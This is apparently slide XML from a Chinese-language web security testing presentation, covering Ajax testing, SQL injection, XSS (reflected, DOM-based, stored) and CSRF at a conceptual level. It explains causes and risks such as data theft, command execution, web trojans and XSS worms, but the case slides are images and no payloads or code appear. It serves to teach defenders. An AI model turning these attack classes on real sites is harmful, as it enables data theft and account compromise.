            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37116804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Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>服务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>-Ajax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Ajax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Ajax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>测试</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35771073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457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>常见安全问题</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1664430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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入攻击的根源在于用户数据与程序代码没有分离，使得攻击者有机会将程序代码当作用户输入数据提交给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>应用程序，以发号施令，为所欲为。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Structured Query Language Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）作为注入攻击的一种，也不例外，其动态生成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>命令时没有对用户输入的数据进行验证，使得用户输入的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>语句得以执行。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7766123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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入攻击案例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>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544" y="908719"/>
            <a:ext cx="5400600" cy="3500389"/>
          </a:xfr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5" y="4005064"/>
            <a:ext cx="604837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33221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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入攻击风险</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>互联网安全的核心问题是数据安全的问题，而通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入，攻击者能够获取企业敏感的业务数据，这也正是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入的厉害之处。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>除了能够获取企业敏感数据外，利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入还能够执行系统命令、添加系统账户以及上传网页木马等等，使远程服务器完全沦为攻击者的肉机。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33275409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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1340768"/>
            <a:ext cx="8229600" cy="4752528"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Cross Site Scripting Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）也叫跨站点脚本注入，本质也是注入类攻击，其根源同</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入一样，违背了数据与代码分离的原则。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>又不同于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入把“攻击者提交的数据当作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>语句在服务器端执行”，而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>把“攻击者提交的数据当作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>在客户端解释执行”。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>分三种类型，分别为反射型、基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>型、存储型。反射型只是简单的把用户输入数据“反射”给浏览器，基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>型通过修改页面的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>节点形成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，存储型会把用户输入数据“存储”在服务器端。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10501882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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击案例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>反射型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="内容占位符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9552" y="980728"/>
            <a:ext cx="5420482" cy="3400900"/>
          </a:xfrm>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3861048"/>
            <a:ext cx="526732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2043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安全的孕育</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>时代在发展，防火墙技术的兴起改变了互联网安全的格局。尤其是以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Cisco</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>HUAWEI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>为代表的网络设备厂商，开始在网络产品中更加重视网络安全，最终改变了互联网安全的走向。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>运营商通过防火墙、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ACL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>技术对于网络的封锁，使得暴露在互联网上的非</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>服务越来越少，再加上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>技术的成熟使得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>应用的功能越来越强大，最终成为了互联网的主流。黑客们的目光也渐渐转移到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>这块大蛋糕上。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4194146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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入攻击案例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>型</a:t>
            </a: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9552" y="980728"/>
            <a:ext cx="7802064" cy="3024336"/>
          </a:xfr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3773" y="3745998"/>
            <a:ext cx="53340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86706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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入攻击案例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>存储型</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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23728" y="980728"/>
            <a:ext cx="5123302" cy="5328592"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="349334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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击风险</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1340768"/>
            <a:ext cx="8229600" cy="4752528"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可以盗取各类用户账号，如登录账号、网银</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>账</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>号、邮箱账号</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>拥有读取、篡改、添加、删除企业敏感数据的能力</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可以盗窃企业重要的具有商业价值的资料</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>拥有网站挂马的能力</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>终极武器，制造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>蠕虫</a:t>
            </a:r>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11109057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CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1340768"/>
            <a:ext cx="8229600" cy="4752528"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="对象 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2648952028"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7345" y="1340768"/>
          <a:ext cx="8631238" cy="3473450"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s1151" name="Visio" r:id="rId4" imgW="8630820" imgH="3473210" progId="Visio.Drawing.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId4" imgW="8630820" imgH="3473210" progId="Visio.Drawing.11">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name=""/>
                      <p:cNvPicPr/>
                      <p:nvPr/>
                    </p:nvPicPr>
                    <p:blipFill>
                      <a:blip r:embed="rId5"/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </p:blipFill>
                    <p:spPr>
                      <a:xfrm>
                        <a:off x="7345" y="1340768"/>
                        <a:ext cx="8631238" cy="3473450"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
